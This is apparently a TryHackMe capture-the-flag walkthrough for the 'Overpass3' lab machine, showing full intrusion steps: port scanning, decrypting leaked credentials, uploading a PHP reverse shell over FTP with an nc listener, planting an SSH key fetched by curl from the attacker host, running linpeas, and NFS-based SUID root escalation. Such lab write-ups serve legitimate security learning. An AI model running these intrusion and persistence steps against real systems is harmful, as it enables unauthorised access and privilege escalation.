TryHackMe - Overpass3
Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 17:50 EDT
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.32% done; ETC: 17:55 (0:00:20 remaining)
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
Not shown: 65235 filtered tcp ports (no-response), 297 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_ 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 5.4 (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.52 secondsGobuster
If we go to the website there is nothing specific that is visible so we can run a gobuster to check for hidden directories
There is a backups page, in there we can find a backup.zip file. The zip is easily extracted (not password protected). In it we find:
A PGP private key
An excel file CUstomerDetails.xlsx.gpg
Decrypt the xlsx
According to this doc it can be decrypted in one command but first we need to import the private key with
pgp --import priv.keyAnd then we can decrypt the file:
Once decrypted the file can be opened with libre office (if you do not have Microsoft Excel like me ;) )
And we get this
So we have usernames and passwords:
paradox ShibesAreGreat123
0day OllieIsTheBestDog
muirlandoracle A11D0gsAreAw3s0me
We can put them both in separate files for later use
FTP
Let's see if we can use those to connect through ftp. (note: I tried with ssh but password authentication is not supported)
Using hydra we have a hit!
So we can connext to the ftp using the creds paradox:ShibesAreGreat123
It seems like this the ftp used to serve the website. We have write permission so we can try to get rce this way.
As it is apache we can try to use a php reverse shell. Lets take the one from pentestmonkey
We modify the IP address and port as we wish
we set up our listener
rlwrap nc -lvp 1234(rlwrap will allow us to have a more interactive shell which is pretty convenient)We put ou reverse shell on the ftp
And now we can navigate to our shell using our browser
http://10.10.4.129/php-reverse-shell.phpWe get a shell!!
Let's use the command find to find a flag
find / -name *flag* 2>/dev/nullThere is one here:/usr/share/httpd/web.flagWe have the web flag
We could try the passwords we got previously with the su command
Let's try with james we get failure with all three pass. Lets try with paradox, it works with the password ShibesAreGreat123
If we ls -al the home directory we have an authorized key for paradox so we could replace it with our public key to have a more stable shell. Lets generate an rsa_key
Now we just need to replace the authorized_keys fil with our public key. First we copy our private key in an authorized_keys file
cp private.pub authorized_keysThen we laucn an http server
python3 -m http.server 80wget does not work in our target so we can use curl instead
curl http://10.13.22.56/authorized_keys --output authorized_keysAnd now the authorized keys is our public key
Now we can just connect this way
ssh -i private paradox@10.10.4.129Let's get linpeas on the machine to enumerate our way to root.
We get linpeas in our machine
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64We launch python http server
python3 -m http.server 80We get it in our target using curl
curl http://10.13.22.56/linpeas_linux_amd64 --output linpeasWe make it executable
chmod +x linpeaswe launch it
./linpeasThere is a recent CVE
cve-2021-4034But there is also this that seems interesting as linpeas highlight as a 95% PE vector
Let's have a look at this documentation from hacktricks
We are not able to mount the share so we need to check the how is nfs running:
we could try to port forward
ssh paradox@10.10.4.129 -i private -L 2049:localhost:2049and then mount the share
We now have access to the user flag and we also have the .ssh folder of james so we can use it to login as james
It works
Let's try to go further with the nfs misconfiguration
For our attacking machine we run
From our shell as jams we can now run
So we get this error we probably need another bash binary let's try with the one from the target machine.
We copy it using scp to our attacking machine
scp -i .ssh/id_rsa james@10.10.4.129:/bin/bash .Let's redo our chomd +s
chmod +s bashWe just need to
./bash -pand it works!
(in fact I accidentally type ./bash at first but then retyping ./bash -p did the trick.
we can get the root flag
bash-4.4# cat /root/root.flag
Last updated